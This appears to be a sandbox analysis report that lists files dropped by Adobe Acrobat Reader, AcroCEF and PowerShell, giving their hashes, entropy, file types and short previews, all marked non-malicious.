                        Preview:{"analyticsData":{"responseGUID":"26d5261a-feae-4b7f-947c-7cebc4f4b9b8","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1737015865178,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):291
                        Entropy (8bit):5.261200617173114
                        Encrypted:false
                        SSDEEP:6:YEQXJ2HXFUPRSUGDcCpvB3/dVlPIHAR0YvjeoAvJfbPtdPeUkwRe9:YvXKXFJaCpvR/ZwHAfVGDV8Ukee9
                        MD5:E8BBE934D7B6C7EA69B061C739CD204E
                        SHA1:1DCBFCC637AC86A2B6A2C905E07D29ED06C7FAD7
                        SHA-256:CC222AB64C06911B6EAC60ADC4CDA118D93DA9BC5F3C90B9366B479525125C70
                        SHA-512:E63FAA7D64BA266829177A81CEAE34B8D47B6B2D886E4283A435F38C1F02832068EA27115204DB1EBA5BAE761A6B2B26E8FE3DC288BCB6F1C91189881397DA2B
                        Malicious:false
                        Preview:{"analyticsData":{"responseGUID":"26d5261a-feae-4b7f-947c-7cebc4f4b9b8","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1737015865178,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):287
                        Entropy (8bit):5.259932117208503
                        Encrypted:false
                        SSDEEP:6:YEQXJ2HXFUPRSUGDcCpvB3/dVlPIHAR0YvjeoAvJf21rPeUkwRe9:YvXKXFJaCpvR/ZwHAfVG+16Ukee9
                        MD5:E83AC8372F0DFA167CAC46267275D498
                        SHA1:19E8613A719EB68A58DB8AD01D3950E99CB947A2
                        SHA-256:F78590364584E843FAFA06D8E844B229D10EE9E886FCCED7AC8CA300B367E091
                        SHA-512:652F78C373F75ACFE284096A8DAD15A86BC4B9AAF63E1500317B92BE00BCB19396F04817F6777CA61C250D9EE62E4CC1BE0DD1FC1593024E5ED39F3BF6A9EAD7
                        Malicious:false
                        Preview:{"analyticsData":{"responseGUID":"26d5261a-feae-4b7f-947c-7cebc4f4b9b8","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1737015865178,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):1090
                        Entropy (8bit):5.666743725364404
                        Encrypted:false
                        SSDEEP:24:Yv6XnJhLmamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSQ:YvKJh0BgkDMUJUAh8cvMQ
                        MD5:181AC4AC10F1385A0FFA6FB4C4F1A3ED
                        SHA1:F9E9AE10D468495370761467E8B57F09314F8A75
                        SHA-256:B1EC85EC1863D9014FC2028365FF382B022F5723B139BBE3CDBBECD5EFA9145F
                        SHA-512:D20CC7A7B0DDD2B56629EFDF8A2D1EF2711845DC16F20089F40539906FF041A9D8E761FE5809E831F97BE9B4D86267BF10CD98E8F93B83EC899764CB6FDFEB49
                        Malicious:false
                        Preview:{"analyticsData":{"responseGUID":"26d5261a-feae-4b7f-947c-7cebc4f4b9b8","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1737015865178,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):286
                        Entropy (8bit):5.235755017635389
                        Encrypted:false
                        SSDEEP:6:YEQXJ2HXFUPRSUGDcCpvB3/dVlPIHAR0YvjeoAvJfshHHrPeUkwRe9:YvXKXFJaCpvR/ZwHAfVGUUUkee9
                        MD5:535BF21AB7D11A35F570A580837FD4B8
                        SHA1:A35E902BA0DA1584AD192E4E3F678DE26B463A6A
                        SHA-256:A9184FF27199931EC2DE6EE7F4C1E3CDB28D19B7A8DC4449BE756E50BC8E59CE
                        SHA-512:8A4D1FC796CA13BF09236BE852E99CCEE4237CBE7860AC80126091069A933009B1E97C15129B26373EFBFAFBDD3E87323C58A83FC37656329BBFBF0951867B70
                        Malicious:false
                        Preview:{"analyticsData":{"responseGUID":"26d5261a-feae-4b7f-947c-7cebc4f4b9b8","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1737015865178,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):282
                        Entropy (8bit):5.258433792482519
                        Encrypted:false
                        SSDEEP:6:YEQXJ2HXFUPRSUGDcCpvB3/dVlPIHAR0YvjeoAvJTqgFCrPeUkwRe9:YvXKXFJaCpvR/ZwHAfVGTq16Ukee9
                        MD5:9BE932578DF6A454AFCF0077A3F97556
                        SHA1:912E708B8C8CCDBBB8563598624C0DD9153EC8A1
                        SHA-256:E82B5B8DF510C045972CB5D7844D5435D495781B9FB8726D547123ED17437CB6
                        SHA-512:C90A873F2D86F239916D70CC8CE61B2B5A51B90A8FE95E26B123EE047749762CBBDFC0FF23489D4598C02E36DB3156E5232A3CCC23F0EFF7F136E3AAFB009D5F
                        Malicious:false
                        Preview:{"analyticsData":{"responseGUID":"26d5261a-feae-4b7f-947c-7cebc4f4b9b8","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1737015865178,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4
                        Entropy (8bit):0.8112781244591328
                        Encrypted:false
                        SSDEEP:3:e:e
                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                        Malicious:false
                        Preview:....
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):2814
                        Entropy (8bit):5.141028829526269
                        Encrypted:false
                        SSDEEP:24:YeRGagEe3ayiilNqKJfe1PRtRLX4GPjXj0SMf7ZC9C2Jm2LSMRCsGV55lERLBLkB:YQeF9foNTIZzRwMzlInIC9L6
                        MD5:7D2B2375881675CAC5C14BD326954A11
                        SHA1:0AAE5CC40C1F44E7052C67AECE53BF544FC21667
                        SHA-256:65E9813249BC0B3858CC037E79510E04958413930E69AC2C910BF7D3CD2D42DC
                        SHA-512:6A7CF158B73345DC0BC505379EAA51D8FEDB67E4A728A66E8DDF69C71BDE2D7857E86C3EC2F567B204641A0E1996907FFC44EB48C96394ABFFD6EF8FEE235F4D
                        Malicious:false
                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"6156fe6763ee1c6c5293b1ca8f727804","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736841399000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"b690b696950b1726d8289f62478972be","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736841399000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"ed80a63587784195f4047b6c2fb44d7c","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736841399000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"2ba9728a0015f409e42caa16dcf3ac25","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736841399000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"b46e71ae088494456be93d52e88ba30a","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736841399000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"46dbfd6d68da9af0c7c760d988fa74d8","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                        Category:dropped
                        Size (bytes):12288
                        Entropy (8bit):1.3195590891305706
                        Encrypted:false
                        SSDEEP:24:TLKufx/XYKQvGJF7urs9Ohn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMenXtqVpn:TGufl2GL7ms9WR1CPmPbPahdypilIb
                        MD5:5CA83751301B1011B0B0AB5AF52640C9
                        SHA1:062C1C205C3EA48AC6C36585882CBD1ECAE24F52
                        SHA-256:6F3BB7D3627F8B4D2243BD9D9ED3858A70E3D03A267B588C2A77952B0E3E69F7
                        SHA-512:019C80080A2EE56DF503B5006714C342E99CA2927D2DEE6E8C9280C4BC30F2B12ACB0D188DBE4A34D98DD40E6F47E554B843E3D74F1C892398B55D998B070255
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:SQLite Rollback Journal
                        Category:dropped
                        Size (bytes):8720
                        Entropy (8bit):1.7781933409013366
                        Encrypted:false
                        SSDEEP:24:7+tFWlhn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMenX4qVpaVrScVr0InmRqLh6:7MfWR1CPmPbPahoypilIZRqFl2GL7ms+
                        MD5:A75278FCF9E11921D8A70BA60372EEC6
                        SHA1:1EB77130A571E77724FAC146F802CA7CCBDC1C82
                        SHA-256:E7B779FA6F0B0DB93A2F2E9B4CC7E78BD937D0BA20B8FA593C1337AF18193F45
                        SHA-512:EC3F9B9564092D0CD46CF3F78F4433E12F5DF3D367D805A02ECB46C39DB21E6E36ED98520FBC56AA812B172546E9BE1A636991C18600FBAF818CB036A2354888
                        Malicious:false
                        Preview:.... .c.....ei.I..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):66726
                        Entropy (8bit):5.392739213842091
                        Encrypted:false
                        SSDEEP:768:RNOpblrU6TBH44ADKZEgurIVjxG9w0DlzTaawUwYHMyPIYyu:6a6TZ44ADEurIVjxgw0DFYmIK
                        MD5:315999A164BBFAA3627E65FDB03050C3
                        SHA1:DE171853BD1F5495953F79DC3C29A83B448F07E3
                        SHA-256:AA0A712D041D65D94C1C6E55FBCC159BFFD8965EF2D8415D2040EDCF1E23C829
                        SHA-512:545255D2F7D608F890F371B4829D0AF977A2C1150A51C4481B9BA2A9D250742856A9B1791437875FBCBD86619EFD8D51ACCB531596F06B9A540E4E68167D4AA6
                        Malicious:false
                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):1.1940658735648508
                        Encrypted:false
                        SSDEEP:3:NlllulXue/p:NllU+O
                        MD5:CE0B00D3B27FB166FCF002BE8B5C239A
                        SHA1:9752C9DCF2363DD534FC40E10BCFE12E8DD29362
                        SHA-256:17BB2A883902E9FCC0A59623BBB5153DDE3D477E0FB3B157A0EE419CA1F7F0BC
                        SHA-512:BF4ABEA3507C405A1FD9223F03384676C0840F70277EB753371F0A78253ECAF0134E3E0039FE5EDE1F644C70ED9CF952F4C12C947AC9D257BBAE4E9CFA6618BA
                        Malicious:false
                        Preview:@...e...................................;............@..........
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):246
                        Entropy (8bit):3.5390718303530573
                        Encrypted:false
                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K84sClAlmf9:Qw946cPbiOxDlbYnuRKIN4
                        MD5:48CADA215714D2A47E87B198338A0C52
                        SHA1:ADA2210B8FF158ADE173FE8840974E322C0C463A
                        SHA-256:25D6CC5448A26C5744CBB69A45162B1603423A8915D22F9C7F15C75F9451CCBE
                        SHA-512:76423F07DE686FBC2BF008796A9DFF749DF616E1663AB1FC613F1E65EAFE818200135119FEED06FD167A4DE98860A8BC74B2F43764E65682A41C1BEE82744B10
                        Malicious:false
                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.4./.0.1./.2.0.2.5. . .0.2.:.5.6.:.3.8. .=.=.=.....
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                        Category:dropped
                        Size (bytes):144514
                        Entropy (8bit):7.992637131260696
                        Encrypted:true
                        SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                        MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                        SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                        SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                        SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                        Malicious:false
                        Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:ASCII text, with very long lines (393)
                        Category:dropped
                        Size (bytes):16525
                        Entropy (8bit):5.33860678500249
                        Encrypted:false
                        SSDEEP:384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B
                        MD5:C3FEDB046D1699616E22C50131AAF109
                        SHA1:C9EEA5A1A16BD2CD8154E8C308C8A336E990CA8D
                        SHA-256:EA948BAC75D609B74084113392C9F0615D447B7F4AACA78D818205503EACC3FD
                        SHA-512:845CDB5166B35B39215A051144452BEF9161FFD735B3F8BD232FB9A7588BA016F7939D91B62E27D6728686DFA181EFC3F3CC9954B2EDAB7FC73FCCE850915185
                        Malicious:false
                        Preview:SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:080+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig:
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                        Category:dropped
                        Size (bytes):15114
                        Entropy (8bit):5.375097193530995
                        Encrypted:false
                        SSDEEP:384:eso1Yo2oQCGvwh2ItDeBwOZwgzIAzVSVaVFTQTH1t9cVGHnm5LmuNnJIrIpgk2Cy:uETgMw
                        MD5:FF17A103186339D6696AFA92AF0DF061
                        SHA1:F383BA61C009F8CC453C2EBF512CB795E8BB80E4
                        SHA-256:E6A6DE086A17418DF59019C0F390826F91097079EE8FF193C0D80904CCA96587
                        SHA-512:97B3F9B29D16FFC054F794ADF926C1ED2FC32332DF8422561F2C428D654A37705B278E04127D0341545E55D997561AF48EE25E0AE2C86087AE6211F6A30AE26E
                        Malicious:false
                        Preview:SessionID=d9fcf27f-ce1d-41a6-a569-a0e183d81c2b.1736841392337 Timestamp=2025-01-14T02:56:32:337-0500 ThreadID=7460 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=d9fcf27f-ce1d-41a6-a569-a0e183d81c2b.1736841392337 Timestamp=2025-01-14T02:56:32:351-0500 ThreadID=7460 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=d9fcf27f-ce1d-41a6-a569-a0e183d81c2b.1736841392337 Timestamp=2025-01-14T02:56:32:351-0500 ThreadID=7460 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=d9fcf27f-ce1d-41a6-a569-a0e183d81c2b.1736841392337 Timestamp=2025-01-14T02:56:32:351-0500 ThreadID=7460 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=d9fcf27f-ce1d-41a6-a569-a0e183d81c2b.1736841392337 Timestamp=2025-01-14T02:56:32:351-0500 ThreadID=7460 Component=ngl-lib_NglAppLib Description="SetConf
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):29752
                        Entropy (8bit):5.411172621760004
                        Encrypted:false
                        SSDEEP:192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cbgcbQIm0cbx:ceo4+rsCZmL
                        MD5:1079CDF16111A9D506357F655371E944
                        SHA1:35FA654B60E5DC1D6A2FDBF1E7729F9487F6A4FA
                        SHA-256:B11789E5C3FD93CA7B9008CE23345705BAE95F73200CB03EB8BB6228727D7AEF
                        SHA-512:6B6A1DB91879AFCEC18252253D9192C6CB811E2E632905244113C0E73325D936B6D17693E28BC8E48DE7CE0F97ED27192F17D9E23AE4AF1824187BA3113F6CC3
                        Malicious:false
                        Preview:05-10-2023 10:18:29:.---2---..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:18:29:.Closing File..05-10-
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                        Category:dropped
                        Size (bytes):386528
                        Entropy (8bit):7.9736851559892425
                        Encrypted:false
                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                        Malicious:false
                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                        Category:dropped
                        Size (bytes):1419751
                        Entropy (8bit):7.976496077007677
                        Encrypted:false
                        SSDEEP:24576:/xaWL07oSwYIGNPUGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JaWLxSwZG6GZn3mlind9i4ufFXpAXkru
                        MD5:C267C8C3D4A0DBACC06F3737E1784EB3
                        SHA1:D798A10176D979377257977E896C8D332B785F23
                        SHA-256:B5B5EF233AADF8F9C3509CDE98C7A9885D0E1B4938CD2A0676170BC8B30855F4
                        SHA-512:3C9CC6700F7827321C0DEADA8F8517F8BAAB6056AF3D7FDAA71BF258C58399EDFDA8601AEBAEEBAB36EF0B1F59BA3E9690EEC2ACD2B8E3A94C8A328261D55D16
                        Malicious:false
